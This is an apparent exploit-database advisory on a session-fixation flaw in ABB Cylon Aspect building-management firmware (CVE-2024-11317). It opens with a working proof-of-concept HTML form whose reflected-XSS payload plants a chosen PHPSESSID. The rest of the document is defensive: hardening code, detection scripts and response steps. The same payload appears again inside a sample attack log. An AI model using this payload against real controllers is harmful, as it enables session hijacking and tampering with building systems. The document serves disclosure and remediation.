ABB Cylon Aspect 3.08.02 - PHP Session Fixation
# Exploit title: ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability
# Advisory ID: ZSL-2025-5916
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php
# CVE ID: CVE-2024-11317
# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session
fixation, allowing an attacker to set a predefined PHPSESSID value. An
attacker can leverage an unauthenticated reflected XSS vulnerability in
jsonProxy.php to inject a crafted request, forcing the victim to adopt
a fixated session.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
<html>
<body>
<!-- Session ID in a cookie (Client-side script) OWASP Ref.: -->
<form action="http://192.168.73.31/jsonProxy.php" method="GET">
<input type="hidden" name="application" value="zeroscience" />
<input type="hidden" name="query" value='<script>document.cookie="PHPSESSID=22222222225555555555111111; path=/"%0A%0Dwindow.location.href="/"</script>' />
<input type="submit" value="Fix!" />
</form>
</body>
</html>

ABB Cylon Aspect 3.08.02 — PHP Session Fixation (CVE-2024-11317)
This article explains the PHP session fixation vulnerability affecting ABB Cylon Aspect firmware (versions up to and including 3.08.02), describes the root causes and impact, and provides practical, defense-oriented guidance for detection, mitigation, and secure coding practices. The goal is to help system owners, administrators, and developers remediate risk and harden their environments.
Advisory snapshot
| Field | Details |
|---|---|
| Advisory | ZSL-2025-5916 (ZeroScience) |
| CVE | CVE-2024-11317 |
| Vendor | ABB Ltd. |
| Affected products | NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio (firmware ≤ 3.08.02) |
| Vulnerability type | Session fixation (via reflected XSS in a JSON proxy endpoint) |
What is session fixation?
Session fixation is an attack technique where an adversary forces a victim's web session identifier to a value known to the attacker. If the application accepts the attacker-chosen session identifier and continues to associate it with an authenticated session, the attacker can reuse that identifier to hijack the victim's active session.
How this affected ABB Cylon Aspect (high level)
- jsonProxy.php, reachable without authentication, reflected its query parameter into the response, which gave an attacker a reflected XSS vector.
- Script injected through that vector could execute document.cookie="PHPSESSID=..." in the victim's browser, so the victim's subsequent requests to the controller carried an attacker-chosen session identifier.
- The application accepted a session identifier it had never issued and kept it unchanged through login, so the attacker-chosen value became the identifier of the victim's authenticated session and the attacker could present it to impersonate the victim.
Impact and risk considerations
Successful exploitation can allow an attacker to access any functionality available in the victim's authenticated session context. On building management systems such as ASPECT, this could include access to telemetry, configuration UI, control operations, or administration features depending on the victim's privileges. Risk is magnified when the web interface is reachable from untrusted networks.
Typical attack scenarios
- Remote attacker lures or tricks an authenticated operator into visiting an attacker-controlled page that forces a preselected session id.
- Attacker reuses the session id to access the controller’s web UI as the victim.
- Data exfiltration, unauthorized changes to control parameters, or pivoting onto internal networks.
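To make the mechanism described above and the three scenario steps concrete, here is a small Python model of PHP's session handling. It is an added illustration, not code from the advisory or from the ASPECT firmware: the two switches stand for PHP's session.use_strict_mode setting and for calling session_regenerate_id(true) at login, the planted ID is the value used in the PoC, and the session store and the "operator" user are assumptions made for the demonstration.

```python
"""Model of PHP-style session handling to show why a planted PHPSESSID works.

Added illustration (not the advisory's or ABB's code). Two behaviours are modelled:
with session.use_strict_mode=0, PHP's default, session_start() adopts an unknown ID
sent by the client; with strict mode on it discards that ID and issues a fresh one.
Calling session_regenerate_id(true) at login is modelled by regenerate_on_login.
"""
import secrets
from typing import Dict, Optional


class SessionStore:
    def __init__(self, strict_mode: bool, regenerate_on_login: bool) -> None:
        self.strict_mode = strict_mode
        self.regenerate_on_login = regenerate_on_login
        self.sessions: Dict[str, dict] = {}

    @staticmethod
    def _new_id() -> str:
        return secrets.token_hex(16)  # 32 random hex chars, like PHP >= 7.1 defaults

    def start(self, client_id: Optional[str]) -> str:
        """session_start(): returns the ID the server will use for this request."""
        if client_id is not None and client_id in self.sessions:
            return client_id                 # known session: resume it
        if client_id is not None and not self.strict_mode:
            self.sessions[client_id] = {}    # non-strict: adopt the client's (attacker's) ID
            return client_id
        sid = self._new_id()                 # strict mode, or no cookie at all: fresh ID
        self.sessions[sid] = {}
        return sid

    def login(self, sid: str, user: str) -> str:
        """Authenticate the session; returns the ID the browser holds afterwards."""
        if self.regenerate_on_login:
            new_sid = self._new_id()
            self.sessions[new_sid] = self.sessions.pop(sid)  # the old ID is now dead
            sid = new_sid
        self.sessions[sid]["user"] = user
        return sid

    def whoami(self, client_id: str) -> Optional[str]:
        """Which user a request carrying this ID is treated as (None if unauthenticated)."""
        return self.sessions.get(client_id, {}).get("user")


PLANTED_ID = "22222222225555555555111111"  # the PHPSESSID value used in the PoC


def run_fixation(strict_mode: bool, regenerate_on_login: bool) -> Optional[str]:
    """Replay the attack against one server configuration.

    Returns the user the attacker is treated as when presenting the planted ID,
    or None if the attack failed.
    """
    server = SessionStore(strict_mode, regenerate_on_login)
    # 1. The XSS in jsonProxy.php runs document.cookie="PHPSESSID=..." in the victim's
    #    browser and redirects to "/", so the next request carries the planted cookie.
    victim_sid = server.start(PLANTED_ID)
    # 2. The victim (an operator, assumed here) logs in to the web UI with that session.
    server.login(victim_sid, "operator")
    # 3. The attacker sends a request with the ID they planted.
    return server.whoami(PLANTED_ID)


if __name__ == "__main__":
    for strict, regen in ((False, False), (True, False), (False, True), (True, True)):
        print(f"use_strict_mode={int(strict)} regenerate_at_login={int(regen)}: "
              f"attacker is {run_fixation(strict, regen)!r}")
```

Only the PHP default pair (strict mode off, no regeneration at login) leaves the attacker logged in as the operator. Regeneration at login defeats the attack on its own, which is why it is the primary fix; strict mode only helps against IDs the server never issued, so an attacker who first obtains a genuine unauthenticated session ID from the controller and plants that one gets past strict mode but not past regeneration.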
Detection and indicators of compromise
- Multiple different user accounts or different source IPs using the same PHPSESSID value in access logs.
- Unusual or predictable-looking session identifiers in logs (see examples below for how to search logs).
- Referrer entries indicating third-party pages triggering requests against JSON or proxy endpoints.
- Anomalous POST/GET requests to jsonProxy-like endpoints with unexpected payloads.
Example commands to search logs (conceptual):
grep -E "PHPSESSID=" /var/log/lighttpd/access.log
awk -F\" '{print $1,$7,$12}' /var/log/httpd/access_log | grep PHPSESSID
Explanation: these examples search HTTP access logs for PHPSESSID values carried in request URLs or in a logged cookie field. The stock combined formats of Apache and lighttpd do not record the Cookie header, so on a default configuration they only find session IDs passed in the URL; add the request's Cookie header to the log format (Apache: %{Cookie}i) if you want to correlate session IDs with source addresses. The awk field numbers assume such a custom format, so adjust paths and field positions to your environment.
Immediate mitigations and workarounds
- Apply vendor patches or firmware updates from ABB as the primary remediation.
- If a patch is not yet available, restrict network access to management interfaces — place devices behind firewalls, VPNs, or management VLANs.
- Disable or restrict access to any JSON proxy endpoints or other web UI functions that reflect input until patched.
- Deploy WAF rules to block or sanitize requests that attempt to inject scripts or modify session cookies via query parameters.
- Invalidate sessions after suspected exposure: rotate administrative credentials and force a session reset for all users.
Permanent fixes: secure configuration and code-level hardening
The robust long-term remediation combines vendor-supplied updates with secure session management and input handling on the server side. Key measures:
- Always regenerate session identifiers after privilege change or authentication (session fixation mitigation).
- Enable strict session ID handling (PHP's session.use_strict_mode) so the server discards any session ID it did not itself issue and replaces it with a freshly generated one.
- Set secure cookie attributes (HttpOnly, Secure, SameSite) to reduce the chance of client-side script access or cross-site misuse.
- Sanitize or validate all reflected output to eliminate reflected XSS vectors.
PHP configuration and code examples (secure practices)
<?php
// Recommended PHP session hardening (must run before session_start()).
// Version notes: session.use_strict_mode needs PHP >= 5.5.2 and session.cookie_samesite
// needs PHP >= 7.3; the PHP 5.4 and older builds listed under "Tested on" have neither.
ini_set('session.use_strict_mode', '1');   // discard any session ID the server did not issue
ini_set('session.cookie_httponly', '1');   // keep document.cookie from reading the ID
ini_set('session.cookie_secure', '1');     // send the cookie only over HTTPS (serve the UI over HTTPS)
ini_set('session.cookie_samesite', 'Lax'); // or 'Strict' if the UI needs no cross-site navigation

session_start();

// After the credentials have been verified (and after any privilege change), issue a fresh ID
// and delete the old session data, so an ID planted before login never names the
// authenticated session. check_credentials() stands in for the application's own check.
if (check_credentials($_POST['user'] ?? '', $_POST['pass'] ?? '')) {
    session_regenerate_id(true);
    $_SESSION['user'] = $_POST['user'];
}
?>
Explanation: These INI settings make PHP sessions resistant to fixation and to script access. session.use_strict_mode makes session_start() discard any ID the server did not itself issue and generate a new one, so a PHPSESSID that was merely planted never becomes a live session. session_regenerate_id(true) issues a fresh ID after authentication and deletes the old session data, so even an ID that was accepted before login is not carried into the authenticated session; this is the control that matters most, because strict mode alone does not help if the attacker first obtained a genuine unauthenticated session ID from the server and planted that one. HttpOnly stops document.cookie from reading the cookie and, per RFC 6265, from overwriting an existing HttpOnly cookie, but it cannot stop a script from planting a PHPSESSID cookie in a browser that has none yet, so the cookie flags are defence in depth rather than the fix. On PHP releases older than 7.3 the SameSite attribute cannot be set through INI and has to be added at the web server or a fronting proxy.
Preventing reflected XSS in PHP endpoints
<?php
$raw = $_GET['query'] ?? '';
// Prefer validation to escaping: accept only the shape the endpoint expects (placeholder pattern).
if (!preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $raw)) {
    http_response_code(400);
    exit;
}
if (($_GET['format'] ?? 'json') === 'html') {   // 'format' is an illustrative parameter
    // HTML context: escape everything that can break out of text or attribute values.
    echo '<p>', htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'), '</p>';
} else {
    // JSON context: json_encode, not htmlspecialchars; the HEX flags keep the body
    // inert as markup and nosniff stops browsers from treating it as HTML.
    header('Content-Type: application/json; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    echo json_encode(['query' => $raw], JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}
?>
Explanation: Escaping has to match the output context. In an HTML response, htmlspecialchars with ENT_QUOTES neutralises the characters that break out of text and attribute values. In a JSON response the right tool is json_encode rather than HTML escaping (HTML-escaping JSON data corrupts it without making it safer); the JSON_HEX_* flags encode <, >, &, ' and " as \uXXXX escapes so the body cannot be read as markup even if a browser renders it directly, and X-Content-Type-Options: nosniff stops that content-type sniffing in the first place. Validation against an allow-list of expected characters or patterns is preferable to blind escaping, and an endpoint that accepts structured parameters should validate them against a strict schema and never reflect raw input into an HTML response.
Configuring web server to enforce cookie flags
When you cannot control application output quickly, you can add headers at the web server layer to harden cookies. Example approaches:
- For Apache: use Header edit to append HttpOnly and Secure flags to Set-Cookie (ensure traffic is HTTPS first).
- For lighttpd: configure mod_setenv or mod_magnet scripts to post-process Set-Cookie headers or use a fronting reverse proxy to rewrite those headers.
# Example conceptual Apache directive (requires mod_headers)
# Header always edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure;SameSite=Lax
Explanation: This Apache example rewrites every Set-Cookie response header to append the security attributes. The always condition is needed when the session cookie is issued on a non-2xx response, such as the 302 after a successful login, because the default onsuccess table only covers 2xx responses. Adding Secure requires serving over HTTPS, and the pattern appends the flags unconditionally, so test against cookies the application already flags to avoid duplicated attributes or broken application behaviour.
Detection tuning and monitoring
- Create SIEM rules that flag repeated use of identical PHPSESSID values from different source IPs or user accounts.
- Alert on requests that include suspicious script markers or unusually long query strings against proxy endpoints.
- Monitor for increases in failed authentication attempts followed by authenticated activity using the same session id.
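The indicators listed under Detection and indicators of compromise and the SIEM rules above come together in the following Python triage script, added here as an example and not part of the advisory. It assumes the web server logs in the Apache/lighttpd combined format with one extra trailing "%{Cookie}i" field (the stock formats do not record cookies), that 192.168.73.31, the PoC's target address, is the controller's own hostname for the referrer check, and the five log lines embedded in it are constructed for the demonstration: the victim at 203.0.113.7 is sent through jsonProxy.php, logs in with the planted PHPSESSID from the PoC, and the attacker at 198.51.100.9 later reuses that ID.

```python
"""Triage of web access logs for session-fixation indicators.

Added example, not part of the advisory. Assumes the combined log format with an
extra trailing "%{Cookie}i" field. SAMPLE_LOG is constructed for the demo: the victim
at 203.0.113.7 is sent through jsonProxy.php, logs in with the planted PHPSESSID from
the PoC, and the attacker at 198.51.100.9 later reuses that ID against /admin/.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import parse_qs, unquote_plus, urlsplit

SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2025:10:01:02 +0000] "GET /jsonProxy.php?application=zeroscience&query=%3Cscript%3Edocument.cookie%3D%22PHPSESSID%3D22222222225555555555111111%3B+path%3D%2F%22%250A%250Dwindow.location.href%3D%22%2F%22%3C%2Fscript%3E HTTP/1.1" 200 512 "http://attacker.example/fix.html" "Mozilla/5.0" "-"
203.0.113.7 - - [12/Mar/2025:10:01:03 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "PHPSESSID=22222222225555555555111111"
203.0.113.7 - - [12/Mar/2025:10:01:30 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0" "PHPSESSID=22222222225555555555111111"
198.51.100.9 - - [12/Mar/2025:10:05:00 +0000] "GET /admin/ HTTP/1.1" 200 4096 "-" "curl/8.0" "PHPSESSID=22222222225555555555111111"
192.0.2.15 - - [12/Mar/2025:10:06:00 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "PHPSESSID=9f2c4e8b1a7d3f6e0c5b2a9d8e7f1c3b"
"""

# host ident user [time] "method uri proto" status bytes "referer" "ua" "cookie"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

# Fragments that have no business in a query sent to a JSON proxy endpoint.
INJECTION_MARKERS = ("<script", "document.cookie", "phpsessid=", "javascript:")

# Hostnames under which the controller serves its own UI (assumed: the PoC's target).
OWN_HOSTS = {"192.168.73.31"}


def parse_line(line: str) -> Optional[dict]:
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def session_id(entry: dict) -> Optional[str]:
    """PHPSESSID from the Cookie header, or from the query string if passed in the URL."""
    for part in entry["cookie"].split(";"):
        name, _, value = part.strip().partition("=")
        if name == "PHPSESSID" and value:
            return value
    qs = parse_qs(urlsplit(entry["uri"]).query)
    return qs.get("PHPSESSID", [None])[0]


def is_injection_attempt(entry: dict) -> bool:
    """Script markers in the decoded query of a request to a *proxy.php endpoint."""
    url = urlsplit(entry["uri"])
    if not url.path.lower().endswith("proxy.php"):
        return False
    decoded = unquote_plus(url.query).lower()
    return any(marker in decoded for marker in INJECTION_MARKERS)


def looks_planted(sid: str) -> bool:
    """Heuristic: server-generated PHP IDs are random hex/base32 strings; a value made
    of a handful of repeated characters was almost certainly chosen by a human."""
    return len(set(sid)) <= 4


def analyze(log_text: str, own_hosts: Set[str] = OWN_HOSTS) -> dict:
    """Run every indicator over the log text and return the hits."""
    ips_by_sid: Dict[str, Set[str]] = defaultdict(set)
    attempts: List[str] = []
    offsite: List[Tuple[str, str]] = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        if is_injection_attempt(entry):
            attempts.append(entry["ip"])
        host = urlsplit(entry["referer"]).netloc.split(":")[0]
        if host and host not in own_hosts:          # third-party page drove this request
            offsite.append((entry["ip"], host))
        sid = session_id(entry)
        if sid:
            ips_by_sid[sid].add(entry["ip"])
    return {
        "injection_attempts": attempts,
        "external_referers": offsite,
        "shared_sessions": {s: sorted(ips) for s, ips in ips_by_sid.items() if len(ips) > 1},
        "weak_ids": sorted(s for s in ips_by_sid if looks_planted(s)),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The four checks map onto the indicators above: injection_attempts and external_referers catch the delivery of the payload through jsonProxy.php, shared_sessions is the SIEM rule for one PHPSESSID used from several source addresses, and weak_ids flags identifiers that do not look server-generated. In production, feed it the controller's real log format and tune the character-diversity threshold, which is a heuristic rather than a property of PHP's ID generator.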
Incident response checklist
- Isolate affected systems from untrusted networks.
- Collect logs and preserve forensic copies of web access logs and system logs.
- Invalidate all active sessions (force logout) and rotate administrative credentials.
- Apply vendor firmware updates; if unavailable, apply mitigations (network controls, WAF rules) and schedule device replacement or layered mitigations.
- Perform a post-remediation audit to verify that endpoints no longer reflect unsanitized input and session handling has been hardened.
Vendor coordination and patching
Primary remediation is to apply the vendor-supplied firmware update or patch that addresses CVE-2024-11317. Contact ABB support or your supplier for firmware images, release notes, and installation guidance. Keep an inventory of affected devices, maintain a patch schedule, and test updates in a staging environment before production rollout.
Summary — key takeaways
- Session fixation combined with reflected XSS in a management interface is a high-risk condition for devices controlling critical infrastructure.
- Immediate steps: restrict network access, enforce session invalidation and credential rotation, deploy WAF rules, and monitor for IOCs.
- Long-term: apply vendor patches, adopt secure session configuration (use_strict_mode, regenerate session id), add cookie flags, and eliminate reflected XSS through strict input validation/escaping.
References and further reading
- Vendor security advisories and firmware release notes (consult ABB official channels).
- CWE-384 Session Fixation and OWASP Session Management Cheat Sheet for detailed defensive patterns.
- OWASP XSS Prevention Cheat Sheet for concrete guidance on avoiding reflected XSS.